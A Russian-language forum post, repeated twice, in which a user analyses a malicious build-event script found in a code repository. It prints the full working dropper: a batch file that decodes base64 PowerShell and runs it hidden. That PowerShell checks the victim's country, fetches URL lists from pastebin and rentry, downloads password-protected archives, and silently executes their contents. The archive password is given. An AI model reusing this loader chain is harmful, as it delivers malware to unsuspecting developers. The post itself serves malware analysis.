Сегодня наткнулся на один репозиторий, обычно всегда проверяю события сборки и не зря. обнаружил вот такой код:
Код:
Скопировать в буфер обмена
@echo off
setlocal
set "base64Data=ZnVuY3Rpb24gRG93bmxvYWQtRmlsZXMoJHVybHMpIHsgJHRlbXBQYXRoID0gW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTsgJHRlbXBGaWxlTmFtZSA9IEpvaW4tUGF0aCAkdGVtcFBhdGggIjd6ci5leGUiOyAkdXJsID0gImh0dHBzOi8vd3d3LjctemlwLm9yZy9hLzd6ci5leGUiOyB0cnkgeyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICR1cmwgLU91dEZpbGUgJHRlbXBGaWxlTmFtZSB9IGNhdGNoIHt9OyBmb3JlYWNoICgkdXJsMSBpbiAkdXJscykgeyB0cnkgeyAkYnl0ZXMgPSBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICR1cmwxIC1NZXRob2QgR2V0IC1Vc2VCYXNpY1BhcnNpbmc7ICRyYW5kU3RyaW5nID0gW1N5c3RlbS5HdWlkXTo6TmV3R3VpZCgpLlRvU3RyaW5nKCkuU3Vic3RyaW5nKDAsIDEwKTsgJGZpbGVQYXRoID0gSm9pbi1QYXRoICR0ZW1wUGF0aCAiJHJhbmRTdHJpbmcuN3oiOyAkYnl0ZXMuQ29udGVudCB8IFNldC1Db250ZW50IC1QYXRoICRmaWxlUGF0aCAtRW5jb2RpbmcgQnl0ZTsgJGV4dHJhY3RQYXRoID0gSm9pbi1QYXRoICR0ZW1wUGF0aCAoIlYiICsgW1N5c3RlbS5HdWlkXTo6TmV3R3VpZCgpLlRvU3RyaW5nKCkpOyAkcHNpID0gTmV3LU9iamVjdCBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbzsgJHBzaS5GaWxlTmFtZSA9ICIkdGVtcFBhdGhcN3pyLmV4ZSI7ICRwc2kuQXJndW1lbnRzID0gInggYCIkZmlsZVBhdGhgIiAtb2AiJGV4dHJhY3RQYXRoYCIgLXBoUjNeJmIyJUE5IWdLKjZMcVA3dGAkTnBXIjsgJHBzaS5DcmVhdGVOb1dpbmRvdyA9ICR0cnVlOyAkcHNpLlVzZVNoZWxsRXhlY3V0ZSA9ICRmYWxzZTsgJHByb2Nlc3MgPSBbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3NdOjpTdGFydCgkcHNpKTsgJHByb2Nlc3MuV2FpdEZvckV4aXQoKTsgJGV4dHJhY3RlZEZpbGVzID0gR2V0LUNoaWxkSXRlbSAtUGF0aCAkZXh0cmFjdFBhdGg7ICRmaWxlVG9FeGVjdXRlID0gJGV4dHJhY3RlZEZpbGVzWzBdLkZ1bGxOYW1lOyAkcHNpID0gTmV3LU9iamVjdCBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbzsgJHBzaS5GaWxlTmFtZSA9ICRmaWxlVG9FeGVjdXRlOyAkcHNpLlVzZVNoZWxsRXhlY3V0ZSA9ICRmYWxzZTsgJHBzaS5DcmVhdGVOb1dpbmRvdyA9ICR0cnVlOyBbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3NdOjpTdGFydCgkcHNpKSB9IGNhdGNoIHt9IH0gfSB0cnkgeyBmdW5jdGlvbiBHZXQtQ291bnRyeSB7ICRpcEluZm8gPSBJbnZva2UtUmVzdE1ldGhvZCAtVXJpICJodHRwOi8vaXAtYXBpLmNvbS9qc29uIjsgcmV0dXJuICRpcEluZm8uY291bnRyeUNvZGUgfSAkY291bnRyeSA9IChHZXQtQ291bnRyeSkuVHJpbSgpOyAkYm9keTEgPSBpZiAoJGNvdW50cnkgLWVxICJSVSIpIHsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1hpYmlkbmNmIiB9IGVsc2UgeyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovL3JlbnRyeS5jby9NdWNrQ29tcGFueU1NQy9yYXciIH07ICR1cmxzID0gJGJvZHkxLkNvbnRlbnQgLXNwbGl0ICJgbiIgfCBGb3JFYWNoLU9iamVjdCB7ICRfLlRyaW0oKSB9OyBEb3dubG9hZC1GaWxlcyAkdXJscyB9IGNhdGNoIHt9"
set "tempDir=%TEMP%\script"
mkdir "%tempDir%" 2>nul
echo Set base64Decoder = CreateObject("MSXml2.DOMDocument.6.0").createElement("base64") > "%tempDir%\script.vbs"
echo base64Decoder.DataType = "bin.base64" >> "%tempDir%\script.vbs"
echo base64Decoder.Text = "%base64Data%" >> "%tempDir%\script.vbs"
echo decodedData = base64Decoder.NodeTypedValue >> "%tempDir%\script.vbs"
echo outputFile = "%tempDir%\decode.ps1" >> "%tempDir%\script.vbs"
echo Set fso = CreateObject("Scripting.FileSystemObject") >> "%tempDir%\script.vbs"
echo Set outFile = fso.CreateTextFile(outputFile, True) >> "%tempDir%\script.vbs"
echo outFile.Write BinaryToString(decodedData) >> "%tempDir%\script.vbs"
echo outFile.Close >> "%tempDir%\script.vbs"
echo Set shell = CreateObject("WScript.Shell") >> "%tempDir%\script.vbs"
echo shell.Run "powershell.exe -ExecutionPolicy Bypass -File " ^& outputFile, 0, True >> "%tempDir%\script.vbs"
echo fso.DeleteFile outputFile >> "%tempDir%\script.vbs"
echo Function BinaryToString(Binary) >> "%tempDir%\script.vbs"
echo Dim RS, L >> "%tempDir%\script.vbs"
echo Set RS = CreateObject("ADODB.Recordset") >> "%tempDir%\script.vbs"
echo L = LenB(Binary) >> "%tempDir%\script.vbs"
echo If L ^> 0 Then >> "%tempDir%\script.vbs"
echo RS.Fields.Append "m", 201, L >> "%tempDir%\script.vbs"
echo RS.Open >> "%tempDir%\script.vbs"
echo RS.AddNew >> "%tempDir%\script.vbs"
echo RS("m").AppendChunk Binary >> "%tempDir%\script.vbs"
echo RS.Update >> "%tempDir%\script.vbs"
echo BinaryToString = RS("m").GetChunk(L) >> "%tempDir%\script.vbs"
echo Else >> "%tempDir%\script.vbs"
echo BinaryToString = "" >> "%tempDir%\script.vbs"
echo End If >> "%tempDir%\script.vbs"
echo End Function >> "%tempDir%\script.vbs"
cscript //nologo "%tempDir%\script.vbs"
rd /s /q "%tempDir%"
endlocal
софт качает 2 архива определяя язык, для RU свой архив для EN другой.
Вроде как нашел пароль но он не подходит, пароль в закодированной строке base64 hR3^&b2%A9!gK*6LqP7t`$NpW
Просто интересно что там в архиве. Может кто добьет, мб я не верно что то понял.
Раскодированная строка:
Код:
Скопировать в буфер обмена
function Download-Files($urls) { $tempPath = [System.IO.Path]::GetTempPath(); $tempFileName = Join-Path $tempPath "7zr.exe"; $url = "https://www.7-zip.org/a/7zr.exe"; try { Invoke-WebRequest -Uri $url -OutFile $tempFileName } catch {}; foreach ($url1 in $urls) { try { $bytes = Invoke-WebRequest -Uri $url1 -Method Get -UseBasicParsing; $randString = [System.Guid]::NewGuid().ToString().Substring(0, 10); $filePath = Join-Path $tempPath "$randString.7z"; $bytes.Content | Set-Content -Path $filePath -Encoding Byte; $extractPath = Join-Path $tempPath ("V" + [System.Guid]::NewGuid().ToString()); $psi = New-Object System.Diagnostics.ProcessStartInfo; $psi.FileName = "$tempPath\7zr.exe"; $psi.Arguments = "x `"$filePath`" -o`"$extractPath`" -phR3^&b2%A9!gK*6LqP7t`$NpW"; $psi.CreateNoWindow = $true; $psi.UseShellExecute = $false; $process = [System.Diagnostics.Process]::Start($psi); $process.WaitForExit(); $extractedFiles = Get-ChildItem -Path $extractPath; $fileToExecute = $extractedFiles[0].FullName; $psi = New-Object System.Diagnostics.ProcessStartInfo; $psi.FileName = $fileToExecute; $psi.UseShellExecute = $false; $psi.CreateNoWindow = $true; [System.Diagnostics.Process]::Start($psi) } catch {} } } try { function Get-Country { $ipInfo = Invoke-RestMethod -Uri "http://ip-api.com/json"; return $ipInfo.countryCode } $country = (Get-Country).Trim(); $body1 = if ($country -eq "RU") { Invoke-WebRequest -Uri "https://pastebin.com/raw/Xibidncf" } else { Invoke-WebRequest -Uri "https://rentry.co/MuckCompanyMMC/raw" }; $urls = $body1.Content -split "`n" | ForEach-Object { $_.Trim() }; Download-Files $urls } catch {}
Сами архивы прикрепил к посту.
Вложения
VisualStudioEN.zip
VisualStudioRU.zip
Последнее редактирование: Суббота в 05:43
Код:
Скопировать в буфер обмена
@echo off
setlocal
set "base64Data=ZnVuY3Rpb24gRG93bmxvYWQtRmlsZXMoJHVybHMpIHsgJHRlbXBQYXRoID0gW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTsgJHRlbXBGaWxlTmFtZSA9IEpvaW4tUGF0aCAkdGVtcFBhdGggIjd6ci5leGUiOyAkdXJsID0gImh0dHBzOi8vd3d3LjctemlwLm9yZy9hLzd6ci5leGUiOyB0cnkgeyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICR1cmwgLU91dEZpbGUgJHRlbXBGaWxlTmFtZSB9IGNhdGNoIHt9OyBmb3JlYWNoICgkdXJsMSBpbiAkdXJscykgeyB0cnkgeyAkYnl0ZXMgPSBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICR1cmwxIC1NZXRob2QgR2V0IC1Vc2VCYXNpY1BhcnNpbmc7ICRyYW5kU3RyaW5nID0gW1N5c3RlbS5HdWlkXTo6TmV3R3VpZCgpLlRvU3RyaW5nKCkuU3Vic3RyaW5nKDAsIDEwKTsgJGZpbGVQYXRoID0gSm9pbi1QYXRoICR0ZW1wUGF0aCAiJHJhbmRTdHJpbmcuN3oiOyAkYnl0ZXMuQ29udGVudCB8IFNldC1Db250ZW50IC1QYXRoICRmaWxlUGF0aCAtRW5jb2RpbmcgQnl0ZTsgJGV4dHJhY3RQYXRoID0gSm9pbi1QYXRoICR0ZW1wUGF0aCAoIlYiICsgW1N5c3RlbS5HdWlkXTo6TmV3R3VpZCgpLlRvU3RyaW5nKCkpOyAkcHNpID0gTmV3LU9iamVjdCBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbzsgJHBzaS5GaWxlTmFtZSA9ICIkdGVtcFBhdGhcN3pyLmV4ZSI7ICRwc2kuQXJndW1lbnRzID0gInggYCIkZmlsZVBhdGhgIiAtb2AiJGV4dHJhY3RQYXRoYCIgLXBoUjNeJmIyJUE5IWdLKjZMcVA3dGAkTnBXIjsgJHBzaS5DcmVhdGVOb1dpbmRvdyA9ICR0cnVlOyAkcHNpLlVzZVNoZWxsRXhlY3V0ZSA9ICRmYWxzZTsgJHByb2Nlc3MgPSBbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3NdOjpTdGFydCgkcHNpKTsgJHByb2Nlc3MuV2FpdEZvckV4aXQoKTsgJGV4dHJhY3RlZEZpbGVzID0gR2V0LUNoaWxkSXRlbSAtUGF0aCAkZXh0cmFjdFBhdGg7ICRmaWxlVG9FeGVjdXRlID0gJGV4dHJhY3RlZEZpbGVzWzBdLkZ1bGxOYW1lOyAkcHNpID0gTmV3LU9iamVjdCBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbzsgJHBzaS5GaWxlTmFtZSA9ICRmaWxlVG9FeGVjdXRlOyAkcHNpLlVzZVNoZWxsRXhlY3V0ZSA9ICRmYWxzZTsgJHBzaS5DcmVhdGVOb1dpbmRvdyA9ICR0cnVlOyBbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3NdOjpTdGFydCgkcHNpKSB9IGNhdGNoIHt9IH0gfSB0cnkgeyBmdW5jdGlvbiBHZXQtQ291bnRyeSB7ICRpcEluZm8gPSBJbnZva2UtUmVzdE1ldGhvZCAtVXJpICJodHRwOi8vaXAtYXBpLmNvbS9qc29uIjsgcmV0dXJuICRpcEluZm8uY291bnRyeUNvZGUgfSAkY291bnRyeSA9IChHZXQtQ291bnRyeSkuVHJpbSgpOyAkYm9keTEgPSBpZiAoJGNvdW50cnkgLWVxICJSVSIpIHsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1hpYmlkbmNmIiB9IGVsc2UgeyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovL3JlbnRyeS5jby9NdWNrQ29tcGFueU1NQy9yYXciIH07ICR1cmxzID0gJGJvZHkxLkNvbnRlbnQgLXNwbGl0ICJgbiIgfCBGb3JFYWNoLU9iamVjdCB7ICRfLlRyaW0oKSB9OyBEb3dubG9hZC1GaWxlcyAkdXJscyB9IGNhdGNoIHt9"
set "tempDir=%TEMP%\script"
mkdir "%tempDir%" 2>nul
echo Set base64Decoder = CreateObject("MSXml2.DOMDocument.6.0").createElement("base64") > "%tempDir%\script.vbs"
echo base64Decoder.DataType = "bin.base64" >> "%tempDir%\script.vbs"
echo base64Decoder.Text = "%base64Data%" >> "%tempDir%\script.vbs"
echo decodedData = base64Decoder.NodeTypedValue >> "%tempDir%\script.vbs"
echo outputFile = "%tempDir%\decode.ps1" >> "%tempDir%\script.vbs"
echo Set fso = CreateObject("Scripting.FileSystemObject") >> "%tempDir%\script.vbs"
echo Set outFile = fso.CreateTextFile(outputFile, True) >> "%tempDir%\script.vbs"
echo outFile.Write BinaryToString(decodedData) >> "%tempDir%\script.vbs"
echo outFile.Close >> "%tempDir%\script.vbs"
echo Set shell = CreateObject("WScript.Shell") >> "%tempDir%\script.vbs"
echo shell.Run "powershell.exe -ExecutionPolicy Bypass -File " ^& outputFile, 0, True >> "%tempDir%\script.vbs"
echo fso.DeleteFile outputFile >> "%tempDir%\script.vbs"
echo Function BinaryToString(Binary) >> "%tempDir%\script.vbs"
echo Dim RS, L >> "%tempDir%\script.vbs"
echo Set RS = CreateObject("ADODB.Recordset") >> "%tempDir%\script.vbs"
echo L = LenB(Binary) >> "%tempDir%\script.vbs"
echo If L ^> 0 Then >> "%tempDir%\script.vbs"
echo RS.Fields.Append "m", 201, L >> "%tempDir%\script.vbs"
echo RS.Open >> "%tempDir%\script.vbs"
echo RS.AddNew >> "%tempDir%\script.vbs"
echo RS("m").AppendChunk Binary >> "%tempDir%\script.vbs"
echo RS.Update >> "%tempDir%\script.vbs"
echo BinaryToString = RS("m").GetChunk(L) >> "%tempDir%\script.vbs"
echo Else >> "%tempDir%\script.vbs"
echo BinaryToString = "" >> "%tempDir%\script.vbs"
echo End If >> "%tempDir%\script.vbs"
echo End Function >> "%tempDir%\script.vbs"
cscript //nologo "%tempDir%\script.vbs"
rd /s /q "%tempDir%"
endlocal
софт качает 2 архива определяя язык, для RU свой архив для EN другой.
Вроде как нашел пароль но он не подходит, пароль в закодированной строке base64 hR3^&b2%A9!gK*6LqP7t`$NpW
Просто интересно что там в архиве. Может кто добьет, мб я не верно что то понял.
Раскодированная строка:
Код:
Скопировать в буфер обмена
function Download-Files($urls) { $tempPath = [System.IO.Path]::GetTempPath(); $tempFileName = Join-Path $tempPath "7zr.exe"; $url = "https://www.7-zip.org/a/7zr.exe"; try { Invoke-WebRequest -Uri $url -OutFile $tempFileName } catch {}; foreach ($url1 in $urls) { try { $bytes = Invoke-WebRequest -Uri $url1 -Method Get -UseBasicParsing; $randString = [System.Guid]::NewGuid().ToString().Substring(0, 10); $filePath = Join-Path $tempPath "$randString.7z"; $bytes.Content | Set-Content -Path $filePath -Encoding Byte; $extractPath = Join-Path $tempPath ("V" + [System.Guid]::NewGuid().ToString()); $psi = New-Object System.Diagnostics.ProcessStartInfo; $psi.FileName = "$tempPath\7zr.exe"; $psi.Arguments = "x `"$filePath`" -o`"$extractPath`" -phR3^&b2%A9!gK*6LqP7t`$NpW"; $psi.CreateNoWindow = $true; $psi.UseShellExecute = $false; $process = [System.Diagnostics.Process]::Start($psi); $process.WaitForExit(); $extractedFiles = Get-ChildItem -Path $extractPath; $fileToExecute = $extractedFiles[0].FullName; $psi = New-Object System.Diagnostics.ProcessStartInfo; $psi.FileName = $fileToExecute; $psi.UseShellExecute = $false; $psi.CreateNoWindow = $true; [System.Diagnostics.Process]::Start($psi) } catch {} } } try { function Get-Country { $ipInfo = Invoke-RestMethod -Uri "http://ip-api.com/json"; return $ipInfo.countryCode } $country = (Get-Country).Trim(); $body1 = if ($country -eq "RU") { Invoke-WebRequest -Uri "https://pastebin.com/raw/Xibidncf" } else { Invoke-WebRequest -Uri "https://rentry.co/MuckCompanyMMC/raw" }; $urls = $body1.Content -split "`n" | ForEach-Object { $_.Trim() }; Download-Files $urls } catch {}
Сами архивы прикрепил к посту.
Вложения
VisualStudioEN.zip
VisualStudioRU.zip
Последнее редактирование: Суббота в 05:43
